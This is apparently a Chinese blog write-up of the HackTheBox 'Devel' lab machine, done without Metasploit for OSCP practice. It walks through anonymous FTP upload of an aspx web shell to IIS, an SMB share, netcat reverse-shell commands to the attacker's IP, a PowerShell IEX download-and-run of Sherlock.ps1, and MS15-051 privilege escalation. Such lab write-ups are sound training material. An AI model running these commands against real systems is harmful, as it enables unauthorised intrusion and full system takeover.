hackthebox-Devel (考点:ftp/IIS/windows)不用msf
用msf做很快,很多人做这台机器写writeup也是用msf做的。但针对oscp,本篇文章不用msf
nmap
看到21ftp要想到进去看看,找敏感文件
匿名anonymous进入
也没啥。但是你也有可能看到一些shell已经在里面了,那是因为之前有人做的留下的。开启机器,不一定会全部重置,会有前人的痕迹。我发现是这样。
可以看到IIS的图片。
再看80
扫描,没什么发现
打开80网页10.10.10.5,发现也就是ftp里的图片,说明往ftp里送东西,可以显示在80网页上
OK、这里要知道IIS,得用asp/aspx文件
locate cmd.aspx
网页版cmd,随便用一个。
在ftp里输入 put cmd.aspx 放进去。
或者通过在文件夹底部的输入框里输入ftp://10.10.10.5。以文件夹形式看ftp,在这里直接把文件复制粘贴进去。
再在网页端执行命令。一切OK。证明有效。
那么在cmd里执行弹shell的命令到我本机。这样我就拿shell了
方法有很多的。
因为是Windows。所以我习惯用smb服务用来传送文件&执行了。工具
先把nc.exe放好到共享的文件夹里 工具下载
打开服务
python smbserver.py Share '/root/exp'
在网页cmd里执行\\10.10.14.57\share\nc.exe -e cmd.exe 10.10.14.57 4445
另外本地监听,收到
当然是个低权限。
可以用powershell的powerup.ps1和夏洛克ps1来寻找提权漏洞。操作方法这些就不细说了,以前的文章说了很多。
powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.57/Sherlock.ps1')
有很多可以提,这次我选择MS15-051,因为昨天写的bastard才用过,可以参考
bastard
但也有些不同,因为systeminfo查看,这台机器不是bastard的64位,所以两个文件要换32位的
本来想用bastard那样的方法,直接简单
\\10.10.14.57\share\ms15-051.exe "\\10.10.14.57\share\nc.exe -e cmd 10.10.14.57 443"
但是一直不管用,虽然显示成功执行了,但就是收不到shell。搞不懂
后来我把这俩文件拷到靶机里。
copy \\10.10.14.57\share\ms15-051.exe
copy \\10.10.14.57\share\nc.exe
最后
c:\Windows\Temp\ms15-051.exe "c:\Windows\Temp\nc.exe -e cmd 10.10.14.57 8080"
成功收到。。。搞定
上一篇: js(二)——js脚本基础